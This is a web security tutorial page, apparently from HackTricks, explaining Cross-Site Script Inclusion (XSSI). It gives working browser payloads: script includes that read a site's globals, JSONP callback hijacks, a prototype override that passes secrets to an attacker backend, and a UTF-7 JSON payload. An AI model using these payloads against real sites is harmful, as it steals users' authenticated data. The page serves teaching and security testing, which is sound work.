XSSI (Cross-Site Script Inclusion)
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Cross-Site Script Inclusion (XSSI) is a vulnerability that arises from the nature of the script tag in HTML. Unlike most resources, which are subject to the Same-Origin Policy (SOP), scripts can be included from different domains. This behaviour is intended to allow libraries and other resources hosted on different servers to be used, but it also introduces a potential security risk: any response that the browser is willing to execute as a script is executed in the including page's global scope, where that page can observe its side effects.
Key Characteristics of XSSI:
- Bypass of SOP: Scripts are exempt from the Same-Origin Policy, allowing them to be included across domains.
- Data Exposure: An attacker can exploit this behaviour to read data loaded via the script tag.
- Impact on Dynamic JavaScript/JSONP: XSSI is particularly relevant for dynamic JavaScript and JSON with Padding (JSONP). These technologies often rely on "ambient-authority" information (such as cookies) for authentication. When a script request is made to a different host, those credentials (e.g., cookies) are automatically included in the request.
- Authentication Token Leakage: An attacker can lure a user's browser to a page they control that includes the victim site's script. The browser attaches the user's credentials to that request, and the attacker's page can then read the sensitive information contained in the response.
Two browser-side caveats limit this in practice: a cookie marked SameSite=Lax or SameSite=Strict is not sent on a cross-site script include, and a response served with a non-script Content-Type plus X-Content-Type-Options: nosniff is refused as a script by current browsers. Endpoints that rely on neither remain exposed.
Types
- Static JavaScript - The conventional form of XSSI: private data sits in a static, publicly reachable script file.
- Static JavaScript with Authentication - Distinct because authentication is required to access the script, so the attack relies on the victim's ambient credentials being attached to the include.
- Dynamic JavaScript - Involves JavaScript that is dynamically generated with content specific to the requesting user.
- Non-JavaScript - Refers to vulnerabilities that do not involve JavaScript directly, but other file types that the browser can be persuaded to load through a script tag.
The following information is a summary of https://www.scip.ch/en/?labs.20160414. Check that article for further details.
Regular XSSI
In this approach, private information is embedded within a globally accessible JavaScript file. Attackers can identify such files by reading files, searching for keywords, or using regular expressions. Once located, the script containing the private information can be included from malicious content, allowing unauthorized access to the sensitive data. An example exploitation technique is shown below:
<script src="https://www.vulnerable-domain.tld/script.js"></script>
<script> alert(JSON.stringify(confidential_keys[0])); </script>
Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI
Dynamic-JavaScript-based XSSI and Authenticated-JavaScript XSSI are XSSI attacks in which confidential information is dynamically added to the script response for the user's request. Detection can be performed by sending requests with and without cookies and comparing the responses. If the responses differ, this may indicate the presence of confidential information. The process can be automated with tools such as the DetectDynamicJS Burp extension.
If the confidential data is stored in a global variable, it can be exploited with the same methods used for Regular XSSI. If the confidential data is included in a JSONP response, attackers can hijack the callback function to retrieve the information. This can be done by manipulating global objects or by setting a function to be executed by the JSONP response, as demonstrated below:
<script>
var angular = function () { return 1; };
angular.callbacks = function () { return 1; };
angular.callbacks._7 = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://site.tld/p?jsonp=angular.callbacks._7" type="text/javascript"></script>
<script>
leak = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script>
For variables not residing in the global namespace, prototype tampering can sometimes be exploited. This technique leverages JavaScript's design, where code interpretation involves traversing the prototype chain to locate the called property. By overriding certain functions, such as Array's slice, before the script is included, attackers can access and leak non-global variables. It only works when the included script actually calls the overridden method on the object holding the secret, so the target script has to be read first to find such a call:
Array.prototype.slice = function(){
// leaks ["secret1", "secret2", "secret3"]
sendToAttackerBackend(this);
};
Non-Script-XSSI
Takeshi Terada's research introduces another form of XSSI, where non-script files, such as CSV, are leaked cross-origin by being included as sources in a script tag. Historical instances of XSSI, such as Jeremiah Grossman's 2006 attack to read a complete Google address book and Joe Walker's 2007 JSON data leak, highlight the severity of these threats. Additionally, Gareth Heyes describes an attack variant involving UTF-7 encoded JSON to escape the JSON format and execute scripts. It was effective only in browsers that honoured a charset="UTF-7" attribute on the include; current browsers do not implement UTF-7 decoding at all, so treat it as a historical technique:
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]
<script src="http://site.tld/json-utf7.json" type="text/javascript" charset="UTF-7"></script>